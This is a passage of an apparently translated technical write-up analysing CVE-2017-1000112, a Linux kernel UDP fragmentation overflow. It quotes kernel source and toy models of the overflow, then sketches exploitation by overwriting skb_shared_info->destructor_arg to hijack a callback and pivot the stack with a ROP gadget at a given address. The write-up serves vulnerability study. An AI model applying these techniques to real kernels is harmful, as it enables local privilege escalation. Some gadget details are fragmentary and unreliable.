    struct sk_buff *skb;
    int err;

    /* There is support for UDP fragmentation offload by network
     * device, so create one single skb packet containing complete
     * udp datagram
     */
    skb = skb_peek_tail(queue);    // (1) Take the tail skb of the queue
    if (!skb) {
        skb = sock_alloc_send_skb(sk,    // (2) Allocate a new skb; the data then goes into its non-linear area (skb_shared_info), as shown in the figure below
                hh_len + fragheaderlen + transhdrlen + 20,
                (flags & MSG_DONTWAIT), &err);

        if (!skb)
            return err;

        /* reserve space for Hardware header */
        skb_reserve(skb, hh_len);

        /* create space for UDP/IP header */
        skb_put(skb, fragheaderlen + transhdrlen);

        /* initialize network header pointer */
        skb_reset_network_header(skb);

        /* initialize protocol header pointer */
        skb->transport_header = skb->network_header + fragheaderlen;

        skb->csum = 0;

        if (flags & MSG_CONFIRM)
            skb_set_dst_pending_confirm(skb, 1);

        __skb_queue_tail(queue, skb);
    } else if (skb_is_gso(skb)) {
        goto append;
    }

    skb->ip_summed = CHECKSUM_PARTIAL;
    /* specify the length of each IP datagram fragment */
    skb_shinfo(skb)->gso_size = maxfraglen - fragheaderlen;
    skb_shinfo(skb)->gso_type = SKB_GSO_UDP;    // The skb_shinfo() macro shows how skb_shared_info relates to the skb:
    // #define skb_shinfo(SKB) ((struct skb_shared_info *)(skb_end_pointer(SKB)))
    // i.e. skb_shared_info sits at the end of the skb's linear data buffer

append:
    return skb_append_datato_frags(sk, skb, getfrag, from,    // (3) Copy the user data into page frags in the skb's non-linear area
                                   (length - transhdrlen));
}
```

skb_shared_info structure:

```c
struct skb_shared_info {
    unsigned short _unused;
    unsigned char nr_frags;
    __u8 tx_flags;
    unsigned short gso_size;
    /* Warning: this field is not always filled in (UFO)! */
    unsigned short gso_segs;
    struct sk_buff *frag_list;
    struct skb_shared_hwtstamps hwtstamps;
    unsigned int gso_type;
    u32 tskey;
    __be32 ip6_frag_id;

    /*
     * Warning : all fields before dataref are cleared in __alloc_skb()
     */
    atomic_t dataref;

    /* Intermediate layers must ensure that destructor_arg
     * remains valid until skb destructor */
    void * destructor_arg;

    /* must be last field, see pskb_expand_head() */
    skb_frag_t frags[MAX_SKB_FRAGS];
};
```
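Because skb_shinfo() points at the end of the linear buffer, the size math of __alloc_skb() tells us where this structure sits relative to the data the (9-6) copy writes. The sketch below models that math under stated assumptions: SMP_CACHE_BYTES = 64, sizeof(struct skb_shared_info) = 320 on this x86-64 4.12 build (the value the article's own numbers imply: 3164 + 320 + 8-byte UDP header = 3492), and kmalloc() rounding requests in this range up to the next power of two. All `toy_*` names are hypothetical.

```c
#include <assert.h>

#define TOY_CACHE_BYTES 64u    /* assumed SMP_CACHE_BYTES */
#define TOY_SHINFO_SIZE 320u   /* assumed sizeof(struct skb_shared_info) */
#define TOY_DATA_ALIGN(x) (((x) + TOY_CACHE_BYTES - 1) & ~(TOY_CACHE_BYTES - 1))

/* Assumed kmalloc() rounding: next power of two, minimum 32. */
static unsigned int toy_kmalloc_size(unsigned int n)
{
    unsigned int s = 32;
    while (s < n)
        s <<= 1;
    return s;
}

/* Offset of skb_shared_info from skb->head, following __alloc_skb():
 *   size  = SKB_DATA_ALIGN(size) + SKB_DATA_ALIGN(sizeof(shinfo));
 *   data  = kmalloc(size);
 *   size  = SKB_WITH_OVERHEAD(ksize(data));   skb->end = size */
static unsigned int toy_shinfo_offset(unsigned int request)
{
    unsigned int size = TOY_DATA_ALIGN(request) + TOY_DATA_ALIGN(TOY_SHINFO_SIZE);
    return toy_kmalloc_size(size) - TOY_DATA_ALIGN(TOY_SHINFO_SIZE);
}
```

For the second send the request is alloclen + hh_len + 15 = 1500 + 16 + 15 = 1531 bytes, which becomes a 2048-byte allocation with skb_shared_info at offset 1728. The (9-6) copy starts at offset hh_len + fragheaderlen = 36 and writes fraggap = 2012 bytes, ending at 2048, so under these assumptions its last 320 bytes land exactly on the new skb's skb_shared_info.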

2.3 Vulnerability analysis

First send: takes the UFO path (ip_ufo_append_data()). The skb is newly allocated, and the data it holds is longer than the MTU.

Second send:

- Before the second send, setsockopt() sets SO_NO_CHECK, i.e. disables UDP checksums. (The kernel uses SO_NO_CHECK to choose between the UFO and non-UFO paths, which is not obvious from the source; see the patch at the beginning of this article.)

- The second send therefore takes the non-UFO path. The skb taken from the tail of the queue is the one allocated during the first send (its len > MTU), so copy = mtu - skb->len is negative.

- Because copy < 0, the non-UFO path allocates a new skb; see (9) in __ip_append_data().

- After that allocation, skb_copy_and_csum_bits() at (9-6) in __ip_append_data() copies data from the old skb_prev (the UFO skb from the first send, whose data sits in page_frag pages referenced by skb_shared_info->frags[]) into the newly allocated sk_buff, causing the overflow.

3. Exploitation

Hijacking a function pointer via skb_shared_info->destructor_arg: when the skb is freed, kfree_skb() eventually invokes a destructor callback for it: kfree_skb() -> __kfree_skb() -> skb_release_all() -> skb_release_data(). Overwriting skb_shared_info->destructor_arg (and thus the ->callback it points to) therefore hijacks the control flow.

```c
static void skb_release_data(struct sk_buff *skb)
{
    ...
    struct ubuf_info *uarg;

    uarg = shinfo->destructor_arg;    // The void * destructor_arg is treated as a struct ubuf_info *
    if (uarg->callback)
        uarg->callback(uarg, true);
    ...
}
```

```c
// struct ubuf_info
/* 1. When DMA for the skb completes, the callback is invoked to release the buffer; the skb's reference count is 0 at that point.
   2. ctx tracks the device context; desc tracks the user-space buffer index.
   3. zerocopy_success reports whether zero-copy took place (the data goes from the file or user buffer to the NIC without being copied through the application, which improves performance and reduces kernel/user context switches; see https://zhuanlan.zhihu.com/p/85571977).
*/
struct ubuf_info {
    void (*callback)(struct ubuf_info *, bool zerocopy_success);
    void *ctx;
    unsigned long desc;
};
```
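The dispatch that makes destructor_arg interesting can be mirrored in user space. The sketch below uses hypothetical `toy_*` types and a counting callback. It assumes, as in the 4.12 source as far as I can tell, that skb_release_data() only reaches the callback when SKBTX_DEV_ZEROCOPY is set in tx_flags (that check is among the lines elided by "..." in the snippet above); `TOY_DEV_ZEROCOPY` stands in for that flag.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

#define TOY_DEV_ZEROCOPY 0x1u   /* stand-in for SKBTX_DEV_ZEROCOPY */

struct toy_ubuf_info {
    void (*callback)(struct toy_ubuf_info *, bool zerocopy_success);
    void *ctx;
    unsigned long desc;
};

struct toy_shared_info {
    unsigned char tx_flags;
    void *destructor_arg;       /* untyped, like the kernel field */
};

/* Same shape as the kernel dispatch: reinterpret destructor_arg as a
 * ubuf_info and call through its callback pointer. */
static void toy_release_data(struct toy_shared_info *shinfo)
{
    if (shinfo->tx_flags & TOY_DEV_ZEROCOPY) {
        struct toy_ubuf_info *uarg = shinfo->destructor_arg;
        if (uarg->callback)
            uarg->callback(uarg, true);
    }
}

/* Example completion callback that only counts invocations. */
static int toy_callback_calls;

static void toy_count_callback(struct toy_ubuf_info *uarg, bool zerocopy_success)
{
    (void)uarg;
    (void)zerocopy_success;
    toy_callback_calls++;
}
```

Whatever function pointer destructor_arg->callback holds is called when the buffer is released, which is why the flags and destructor_arg stored in skb_shared_info decide where execution goes.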

Problem: the gadget at 0xffff8100008d (xchg eax, esp; ret) cannot be used: execution simply stops, with no error message.

Solution: use another occurrence of the gadget at a higher address. xchg eax, esp; ret is encoded as the bytes 94 C3, so search for that byte sequence in IDA (Search -> Sequence of bytes).

.text:FFFFFFFF8104AD63 setz r11b

Version adaptation: for a different kernel version, adjust the gadget offsets, the skb_shared_info structure definition, and SHINFO_OFFSET (the offset of the skb_shared_info structure within the buffer).



Screenshot of successful test:

References

- Linux kernel [CVE-2017-1000112] (UDP Fragment Offload) analysis

- Linux Kernel Vulnerability Can Lead to Privilege Escalation: Analyzing CVE-2017-1000112

- Linux network protocol stack – ip_append_data function analysis